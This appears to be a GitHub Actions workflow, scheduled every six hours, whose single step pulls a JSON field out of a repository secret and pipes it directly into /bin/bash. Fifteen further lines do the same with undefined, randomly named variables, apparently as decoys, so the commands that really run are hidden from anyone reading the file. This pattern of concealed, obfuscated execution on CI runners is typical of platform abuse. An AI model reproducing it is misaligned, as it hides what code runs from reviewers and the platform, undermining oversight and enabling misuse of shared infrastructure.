name: peixuan19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '49 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: peixuan19871010
        env:
          h7: ${{ secrets.h7 }}
        run: |
          echo $h7 | jq -r .pfx4875 | /bin/bash
          echo $gov43537 | jq -r .ffqqb5 | /bin/bash
          echo $t571 | jq -r .tw2 | /bin/bash
          echo $na32539 | jq -r .mi259 | /bin/bash
          echo $giaq07569 | jq -r .mqkh953 | /bin/bash
          echo $ywyyv90 | jq -r .yg01 | /bin/bash
          echo $tbtw4 | jq -r .gqd74421 | /bin/bash
          echo $w155 | jq -r .u8 | /bin/bash
          echo $xyxn3 | jq -r .tj2359 | /bin/bash
          echo $wxpqv0 | jq -r .ynhiv22046 | /bin/bash
          echo $rdl1 | jq -r .aahu2 | /bin/bash
          echo $rsh36135 | jq -r .s9 | /bin/bash
          echo $kmeax1 | jq -r .j6 | /bin/bash
          echo $joaq8967 | jq -r .ka4 | /bin/bash
          echo $pxt60020 | jq -r .oyaiw1636 | /bin/bash
          echo $ljgi3 | jq -r .prs13724 | /bin/bash

